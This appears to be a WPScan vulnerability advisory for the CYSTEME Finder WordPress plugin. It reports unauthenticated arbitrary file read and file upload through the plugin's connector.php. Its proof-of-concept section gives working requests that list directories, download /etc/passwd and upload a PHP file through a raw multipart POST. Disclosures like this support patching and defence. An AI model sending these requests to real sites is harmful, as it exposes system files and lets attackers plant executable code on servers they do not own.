Lucene search

K
wpvulndbT0w3ntumWPVDB-ID:3F8B9AEF-EF80-4636-B361-AECFFD8E8992
HistoryAug 24, 2016 - 12:00 a.m.

CYSTEME Finder <= 1.3 - Unauthenticated LFI and Unauthenticated File Upload

2016-08-2400:00:00
t0w3ntum
wpscan.com
5

EPSS

0.008

Percentile

81.7%

CYSTEME does not properly check SESSION Cookies allowing a remote attacker to upload, view, or delete files from any location on the remote file system.

PoC

- Retrieve all data in the root wordpress directory. This will return JSON. Exploit: http://example.com/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&amp;cmd;=open&amp;init;=1&amp;tree;=1 Simply replacing wphome with any other directory path will return file information for that directory. If you want to download that file, get the hash value for the file and include it in the following request: Will download /etc/passwd http://example.com/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&amp;cmd;=file&amp;target;=l1_cGFzc3dk&amp;download;=1 ### File Upload As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following. POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl;=http://example.com HTTP/1.1 Host: http://example.com Content-Length: 314 Origin: http://example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Content-Type: multipart/form-data; boundary=--------723608748 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close ----------723608748 Content-Disposition: form-data; name=“cmd” upload ----------723608748 Content-Disposition: form-data; name=“target” l1_Lw ----------723608748 Content-Disposition: form-data; name=“upload[]”; filename=“test.php” Content-Type: text/html ----------723608748–

EPSS

0.008

Percentile

81.7%

Related for WPVDB-ID:3F8B9AEF-EF80-4636-B361-AECFFD8E8992